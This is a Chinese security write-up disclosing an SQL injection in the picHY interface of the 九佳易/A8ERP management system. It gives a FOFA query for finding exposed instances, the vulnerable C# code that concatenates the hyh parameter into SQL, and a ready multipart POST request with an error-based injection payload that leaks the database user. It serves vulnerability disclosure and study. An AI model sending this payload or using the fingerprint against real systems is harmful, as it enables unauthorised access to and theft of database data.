九佳易管理系统 picHY.ashx SQL 注入漏洞


漏洞简介

九佳易管理系统中的 picHY.ashx 通用处理程序接口存在SQL注入漏洞,该接口主要用于处理前端 AJAX 请求并与后端数据库进行交互。由于接口未对客户端传入的关键参数进行严格的输入校验、参数化处理或特殊字符转义,攻击者可通过构造恶意的 SQL 语句片段注入到请求参数中,使后端数据库执行非授权的 SQL 操作,进而窃取、篡改甚至销毁数据库中的敏感数据。

影响版本

fofa语法

title="VSQL" && body="/Scripts/Login_A8/"

漏洞分析

根据 picHY.ashx 的代码引用

<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="picHY.aspx.cs" Inherits="A8ERP.HuiYuan.HuiYuanDangAn.picHY" %>

找到 A8ERP.HuiYuan.HuiYuanDangAn.picHY 相关类的实现逻辑

using System;
using System.Collections.Generic;
using System.Data;
using System.Web.UI;
using System.Web.UI.HtmlControls;

#nullable disable
namespace A8ERP.HuiYuan.HuiYuanDangAn;

public class picHY : Page
{
  protected HtmlHead Head1;
  public List<string> piclist = new List<string>();
  public int picCount;

  protected void Page_Load(object sender, EventArgs e)
  {
    string str = this.Request["hyh"];
    DBHelp dbHelp = new DBHelp();
    dbHelp.Open();
    string sql = $"SELECT top 1 default_disp FROM da_hy_pic   where  hyh='{str}'";
    DataTable dataTable = dbHelp.QueryRDataTable(sql);
    this.picCount = ((InternalDataCollectionBase) dataTable.Rows).Count;
    if (this.picCount <= 0)
    {
      this.piclist.Insert(0, "http://localhost:1130/SPPics/HY/jjy.jpg");
    }
    else
    {
      for (int index = 0; index < this.picCount; ++index)
        this.piclist.Insert(index, dataTable.Rows[index][0].ToString());
    }
    dbHelp.Close();
  }
}

非常明显拼接导致的SQL注入,参数string str = this.Request["hyh"];无任何过滤或校验被直接拼接到$"SELECT top 1 default_disp FROM da_hy_pic where hyh='{str}'"sql语句中,然后调用dbHelp.QueryRDataTable()方法进行执行,从而造成SQL注入漏洞。

漏洞复现

因为参数获取是通过this.Request["hyh"]的方式,因此支持get、post等常规方式外,还支持multipart格式

POST /HuiYuan/HuiYuanDangAn/picHY.aspx HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Host: a8erp.mrxn.net

------WebKitFormBoundary
Content-Disposition: form-data; name="hyh"

'-1/user--
------WebKitFormBoundary--

成功利用报错注入在响应回显当前数据库用户信息


手机扫码阅读

青龙面板最新版v2.20.1 鉴权绕过致RCE漏洞

大蚂蚁 (BigAnt) 即时通讯系统 安装程序二次注入致远程代码执行漏洞

评 论